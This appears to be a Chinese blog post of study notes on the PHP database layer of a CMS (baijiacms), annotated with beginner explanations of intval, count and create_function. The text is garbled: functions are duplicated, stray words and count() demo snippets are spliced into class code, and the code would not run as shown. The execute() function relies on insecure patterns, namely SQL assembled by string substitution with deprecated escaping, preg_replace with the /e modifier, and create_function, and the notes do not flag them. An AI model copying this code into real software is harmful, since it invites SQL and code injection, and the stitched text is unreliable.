}intval() 是 PHP 中用于将变量转换为整型的内置函数。其核心作用是获取变量的整数值,适用于字符串、浮点数、布尔值等类型,但不推荐直接用于数组或对象(会触发 Notice 错误)。
function getStoreBeid($beid)
{
$system_store = mysqld_select('SELECT * FROM '.table('system_store')." store where store.id=:id and `deleted`=0",array(":id"=>$beid));
return $system_store;
}
function iserializer($value) {
return serialize($value);
}function table($table) {
return "`baijiacms_{$table}`";
}
function mysqldb() {
global $_CMS;
static $db;
if(empty($db)) {
$db = new PdoUtil($_CMS['dbconfig']['db']);
}
$_CMS['dbconfig']['db']="";
return $db;
}
function mysqldb() {
global $_CMS;
static $db;
//连接
if(empty($db)) {
$db = new PdoUtil($_CMS['dbconfig']['db']);
}
//清空
$_CMS['dbconfig']['db']="";
return $db;
}
public function fetch($sql, $params = array()) {
$statement = $this->dbo->prepare($sql);
$result = $statement->execute($params);
if(SQL_DEBUG) {
$this->debug($statement->errorInfo(),$sql);
}
if (!$result) {
return false;
} else {
return $statement->fetch(pdo::FETCH_ASSOC);
}
}
后
function execute($array = Array()) {
//count() 是 PHP 中用于统计数组元素个数或对象属性数量的内置函数。
//基本语法
//count(array, mode);
if(count($this->__boundParams) > 0)
$array = &$this->__boundParams;
$__query = $this->__query;
//
if(count($array) > 0) {
foreach($array as $k => $v) {
//过滤
//不是整数或第一个是:
if(!is_int($k) || substr($k, 0, 1) === ':') {
//$tempf空
if(!isset($tempf))
//数组
$tempf = $tempr = array();
//$fruits = ['apple', 'banana'];
//$newLength = array_push($fruits, 'orange');
// $fruits 变为 ['apple', 'banana', 'orange']
//添加k
array_push($tempf, $k);
//过滤v
array_push($tempr, '"'.mysql_escape_string($v).'"');
}
else {
//create_function() 是 PHP 早期用于动态创建匿名函数(也称 lambda 函数)的内置函数,但自 PHP 7.2 起已被废弃,并在 PHP 8.0 中被彻底移除
//可执行
$parse = create_function('$v', 'return \'"\'.mysql_escape_string($v).\'"\';');
$__query = preg_replace("/(\?)/e", '$parse($array[$k++]);', $__query);
break;
}
}
if(isset($tempf)) {
foreach ($tempf as $k=>$v) {
$search[$k] = '/' . preg_quote($tempf[$k],'`') . '\b/';
}
$__query = preg_replace($search, $tempr, $__query);
//$__query = str_replace($tempf, $tempr, $__query);
}
}
if(is_null($this->__result = &$this->__uquery($__query)))
$keyvars = false;
else
$keyvars = true;
$this->__boundParams = array();
return $keyvars;
}
// 一维数组
$fruits = ['apple', 'banana', 'orange'];
echo count($fruits); // 输出: 3
// 二维数组
$students = [
['Tom', 18],
['Alice', 20]
];
echo count($students); // 输出: 2(仅外层)
echo count($students, 1); // 输出: 6(递归:2个内嵌数组 + 4个元素)class PdoUtil {
private $dbo;
private $cfg;
public function __construct($cfg) {
global $_CMS;
if(empty($cfg)) {
exit('<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /></head><body>无法读取/config/config.php数据库配置项.</body></html>');
}
$mysqlurl = "mysql:dbname={$cfg['database']};host={$cfg['host']};port={$cfg['port']}";
try {
$this->dbo = new PDO($mysqlurl, $cfg['username'], $cfg['password']);
} catch (PDOException $e) {
exit('<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /></head><body>数据库连接失败,请检查数据库配置:/config/config.php</body></html>');
}
$sql = "SET NAMES '{$cfg['charset']}';";
$this->dbo->exec($sql);
$this->dbo->exec("SET sql_mode='';");
$this->cfg = $cfg;
if(SQL_DEBUG) {
$this->debug($this->dbo->errorInfo(),$sql);
}
}
public function query($sql, $params = array()) {
if (empty($params)) {
$result = $this->dbo->exec($sql);
if(SQL_DEBUG) {
$this->debug($this->dbo->errorInfo(),$sql);
}
return $result;
}
$statement = $this->dbo->prepare($sql);
$result = $statement->execute($params);
if(SQL_DEBUG) {
//预处理
$this->debug($statement->errorInfo(),$sql);
}
if (!$result) {
return false;
} else {
return $statement->rowCount();
}
}
function execute($array = Array()) {
//
if(count($this->__boundParams) > 0)
$array = &$this->__boundParams;
$__query = $this->__query;
if(count($array) > 0) {
foreach($array as $k => $v) {
if(!is_int($k) || substr($k, 0, 1) === ':') {
if(!isset($tempf))
$tempf = $tempr = array();
array_push($tempf, $k);
array_push($tempr, '"'.mysql_escape_string($v).'"');
}
else {
$parse = create_function('$v', 'return \'"\'.mysql_escape_string($v).\'"\';');
$__query = preg_replace("/(\?)/e", '$parse($array[$k++]);', $__query);
break;
}
}
if(isset($tempf)) {
foreach ($tempf as $k=>$v) {
$search[$k] = '/' . preg_quote($tempf[$k],'`') . '\b/';
}
$__query = preg_replace($search, $tempr, $__query);
//$__query = str_replace($tempf, $tempr, $__query);
}
}
if(is_null($this->__result = &$this->__uquery($__query)))
$keyvars = false;
else
$keyvars = true;
$this->__boundParams = array();
return $keyvars;
}
AtomGit 是由开放原子开源基金会联合 CSDN 等生态伙伴共同推出的新一代开源与人工智能协作平台。平台坚持“开放、中立、公益”的理念,把代码托管、模型共享、数据集托管、智能体开发体验和算力服务整合在一起,为开发者提供从开发、训练到部署的一站式体验。
更多推荐
0
0- 0
已为社区贡献6条内容
所有评论(0)